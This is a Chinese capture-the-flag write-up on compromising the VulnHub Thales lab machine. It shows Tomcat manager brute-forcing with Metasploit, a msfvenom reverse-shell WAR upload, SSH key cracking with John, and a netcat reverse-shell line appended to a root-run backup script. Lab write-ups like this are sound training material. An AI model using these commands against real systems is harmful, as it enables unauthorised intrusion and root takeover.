vulnhub靶场之Thales

一.环境搭建

1.靶场描述

Description : Open your eyes and change your perspective
includes 2 flags:user.txt and root.txt.
Telegram: @machineboy141 (for any hint)
This works better with VIrtualBox rathe than VMware

2.靶场地址

https://www.vulnhub.com/entry/thales-1,749/
 

image-20240129163223146

3.启动靶场

Thales靶机在VMware运行会出现bug,所以我们在VirtualBox运行。

image-20240129163328402

虚拟机开启之后界面如上,我们不知道ip,需要自己探活,因为我们在VirtualBox运行所以网段发生了变化,网段知道:192.168.1.0/24

二.渗透测试

1.目标

目标就是我们搭建的靶场,靶场IP为:192.168.1.0/24

2.信息收集

(1)寻找靶场真实ip

nmap -sP 192.168.1.0/24
 

image-20240129163940132

arp-scan -l
 

image-20240129164229619

靶场真实ip地址为192.168.1.13

(2)探测端口及服务

nmap -p- -sV 192.168.1.13
 

image-20240129164045121

发现开启了22端口,OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
发现开启了8080端口,Apache Tomcat 9.0.52
 

(3)web指纹识别

whatweb -v 192.168.1.13:8080
 

image-20240129164342897

3.渗透测试

(1)访问web服务

http://192.168.1.13:8080
 

image-20240129164445794

我们可以看到是Tomcat

(2)扫描web服务

1)棱洞3.0指纹识别
./EHole_linux_amd64 finger -u http://192.168.1.13:8080
 

image-20240129164921542

2)nikto扫描网站结构
nikto -h http://192.168.1.13:8080
 
3)dirsearch目录扫描
dirsearch -u 192.168.1.13:8080 -e * -x 403 --random-agent
 

我们扫描到一个登录页面

http://192.168.1.13:8080/manager
 

image-20240129165606671

目前,我们掌握的信息是一个tomcat框架和一个登录页面,因为tomcat 有管理登录页面,于是尝试爆破

(3)渗透测试

1)msf爆破
search login tomcat
 

image-20240129170544353

show options
 
set RHOSTS 192.168.1.13
 

image-20240129170723929

爆破出来一个用户名和密码

image-20240129170810334

tomcat:role1

2)登录

我们可以看到登录成功

image-20240129170852364

3)反弹shell

我们可以看到/shell和上传页面,那么我们进行shell,在 web 应用程序部署界面尝试在上传 war 包反弹 shell

image-20240129171145361

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.9 LPORT=666666 -f war -o MS02423.war
 

image-20240129172804028

我们进行上传

image-20240129172724391

上传成功后,在应用程序列表中看到已成功部署了 war 后门,点击访问后反弹

image-20240129172826998

我们可以看到反弹成功

我们进行提权,发现需要密码,我们进行查找

image-20240129173210637

4)执行脚本

一般情况下,我们首先去home目录下查看,然后在去/var/www/html/目录下查看有没有什么线索,我们看到了thales命令,我们进行查看

image-20240130161433886

我们看到了两个txt文件,模式里面提示我们,一个flag在user.txt,一个在root.txt里面,那么我们进行查看user.txt文件,但是需要thales权限,我们查看notes.txt文件,notes.txt 中告诉我们有一个备用脚本在 /usr/local/bin/backup.sh

includes 2 flags:user.txt and root.txt.
 

image-20240130161558059

image-20240130161920839

我们去执行这个脚本,但是执行之后却发现没有如何变化

5)ssh 私钥文件

我们在thales目录下发现了隐藏的.ssh文件,我们进行查看

image-20240130162530044

这样看太难受了,我们进行交互模式进行查看

image-20240130162852020

我们可以看到公钥,我们进行查看

我们把它保存下来,用john进行爆破

6)john爆破

将私钥文件保存到攻击机,利用 ssh2john 将私钥转化为 john 能处理的 SHA 加密的文件,然后进行爆破,得到密码为 vodka06

image-20240130170943990

image-20240130171014530

image-20240130171045172

7)查看user.txt文件

我们进行登录thales用户名

image-20240130171432515

我们获取到第一个flag,还有一个flag在root.txt里面,我们进行提权

8)提权

之前我们看到的那个脚本还没有查看内容,现在我们查看一下那个备份文件的代码

image-20240130171752726

是一个shell文件,并且是能运行命令的,我们是可以编辑的,并且是root用户运行的,我们插入一串反弹shell的命令

image-20240130171844539

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.9 5555 >/tmp/f" >> backup.sh
 

image-20240130172619811

等一会可以看到反弹成功,我们查看flag即可

image-20240130172935974

三.相关资源

1.靶场下载地址

2.nmap

3.arp-scan

4.masscan

5.[ 常用工具篇 ] 渗透神器 whatweb 安装使用详解

6.[ 渗透工具篇 ] EHole(棱洞)3.0安装部署及详解(linux & win)

7.nikto工具的使用

8.dirsearch目录扫描

9.msf工具使用

10.ssh私钥文件

11.john爆破密码

12.反弹shell

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/669078.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

ensp实验合集(二)

实验6 VLAN划分....................................................................... - 30 - 实验7 路由器调试及常用命令使用........................................ - 42 - 实验8 配置静态路由器............................................................…

GCC编译器的使用以及使用Makefile语法进行操控

Makefile 这里使用的Makefile操控编译器 gcc 常见的组成部分 c: gcc 的一个版本,默认语言设置为 C,而且在链接的时候自动包含标准 C 库。这和 g 一样configure: GCC 源代码树根目录中的一个脚本。用于设置配置值和创建 GCC 编…

P2SH地址嵌套SegWit脚本

主要分为以下步骤: 创建SegWit脚本:首先,您需要创建一个SegWit脚本,可以是Pay-to-Witness-Public-Key-Hash(P2WPKH)或Pay-to-Witness-Script-Hash(P2WSH)脚本。这些脚本使用新的Seg…

pytest中fixture的使用方法

一、pytest中的fixture是什么 为可靠的和可重复执行的测试提供固定的基线(可以理解为测试的固定配置,使不同范围的测试都能够获得统一的配置),fixture提供了区别于传统单元测试(setup/teardown)风格的令人…

2024最新版鸿蒙HarmonyOS开发工具安装使用指南

2024最新版鸿蒙HarmonyOS开发工具安装使用指南 By JacksonML 0. 什么是鸿蒙Harmony OS? 华为鸿蒙系统(HUAWEI Harmony OS),是华为公司在2019年8月9日于东莞举行的华为开发者大会(HDC.2019)上正式发布的分…

算法每日一题: Nim游戏 | 找规律

哈哈,大家好,我是星恒,今天的每日一题真开心,连做了3天牢,终于ak了一道,太不容易了 这道题其实就是找规律,刚开始我还以为是动归,但是列举了不少例子之后,发现有自己直接…

蓝桥杯每日一题-----数位dp练习

题目 链接 参考代码 写了两个,一个是很久以前写的,一个是最近刚写的,很久以前写的时候还不会数位dp所以写了比较详细的注释,这两个代码主要是设置了不同的记忆数组,通过这两个代码可以理解记忆数组设置的灵活性。 im…

redis源码之:集群创建与节点通信(1)

一、创建集群与添加节点(meet) 通过redis源码之:redis-cli 集群命令发现,不管是新建cluster集群还是往集群里添加新节点,都是通过meet指令完成,假设有ABCD四个节点,新建集群:redis-…

vue3父子组件相互调用方法(setup)

一、父组件调用子组件方法 子组件需要使用defineExpose对外暴露方法&#xff0c;父组件才可以调用&#xff01; 1.父组件 <template><button click"getChild">触发子组件方法</button><!-- 一&#xff1a;定义 ref --><Child ref"…

Vue学习笔记之组件基础

1、组件的定义 一般将 Vue 组件定义在一个单独的 .vue 文件中&#xff0c;称做单文件组件&#xff1b;当然也可以将组件直接定义在js文件中&#xff0c;如下js代码&#xff0c;定义一个组件BlogPost&#xff0c;通过props定义对外暴露属性title&#xff0c;父组件传递title&am…

分享62个节日PPT,总有一款适合您

分享62个节日PPT&#xff0c;总有一款适合您 62个节日PPT下载链接&#xff1a;https://pan.baidu.com/s/1mheNtIvXknGHse44FW7nOw?pwd6666 提取码&#xff1a;6666 Python采集代码下载链接&#xff1a;采集代码.zip - 蓝奏云 学习知识费力气&#xff0c;收集整理更不易…

api接口是什么意思,api接口该如何防护呢?

API接口&#xff1a;应用程序与服务之间的接口 什么是API接口 API是应用程序接口的缩写&#xff0c;指的是能够让不同的应用程序之间交换数据的一种方式。一个API接口就是应用程序与服务之间的接口&#xff0c;它定义了服务提供的功能和数据&#xff0c;以及应用程序如何访问这…

【工具】使用asciidoctor-pdf将adoc文件转换成pdf

文章目录 配置方法配置gem镜像源安装工具 asciidoctor-pdf 将adoc转换成pdfreference 配置方法 使用gem镜像源&#xff0c; 安装工具 asciidoctor-pdf 配置gem镜像源 查找默认源 gem sources移除默认源 gem sources --remove https://rubygems.org/添加新镜像源 gem source…

2023年全球软件架构师峰会(ArchSummit上海站):核心内容与学习收获(附大会核心PPT下载)

微服务架构是当今软件架构的主流趋势之一。随着云计算和分布式系统的普及&#xff0c;越来越多的企业开始采用微服务架构来构建他们的应用。微服务架构可以将一个大型的应用拆分成多个小型的服务&#xff0c;每个服务都独立部署、独立运行&#xff0c;并通过轻量级的通信协议进…

非常好看的CSS加载中特效,引用css文件既可用

非常好看的CSS加载中特效 demo效果源码&#xff1a; <!DOCTYPE html5> <head><link rel"stylesheet" type"text/css" href"demo.css"/><link rel"stylesheet" type"text/css" href"loaders.css&…

【Qt解决】QIcon图标不显示以及LNK2019: 无法解析的外部符号问题

一句话解决 qmake重新构建&#xff0c;然后build&#xff0c;然后run 原因剖析 QIcon图标不显示 首先确保 qrc 文件已经添加对应图标文件&#xff0c;但是仍然不显示是因为没有编译新文件 LNK2019: 无法解析的外部符号 明明已经定义的槽函数&#xff0c;还是报这个错&…

开发板有线连主机,主机无线上网,开发板上网

网络配置&#xff1a; 以太网4连接开发板 wlan设置共享 vmwave需要禁用&#xff08;否则占用共享地址192.168.137.1&#xff09; 开发板 /etc/netplan 目录下&#xff1a;xx.yaml 00-installer-config.yaml /etc/resolv.conf route -n ifconfig 可以ping主机 可ping自己…

SpringBoot中的WebMvcConfigurer

SpringBoot中的WebMvcConfigurer 一、WebMvcConfigurer二、页面跳转控制器三、数据格式化1.Formatter\<T>2.内容转换器 四、拦截器 一、WebMvcConfigurer WebMvcConfigurer 作为配置类&#xff0c;采用 JavaBean 的形式来代替传统的 XML 配置文件形式&#xff0c;进而针…

SpringSecurity(18)——OAuth2授权码管理

AuthorizationCodeServices public interface AuthorizationCodeServices {//为指定的身份验证创建授权代码。String createAuthorizationCode(OAuth2Authentication authentication);//使用授权码。OAuth2Authentication consumeAuthorizationCode(String code)throws Invali…

C/C++实现无序入参的命令解析工具

C/C实现无序入参的命令解析工具 1 实现思路2 主要功能3 效果展示3.1 直接运行代码图3.2help命令执行效果图3.3命令行执行命令解析效果图 4 代码实现5 代码下载 1 实现思路 基本介绍&#xff1a; 思路来源于atlas,atc(模型转换工具)&#xff0c;该工具对命令支持众多&#xff0…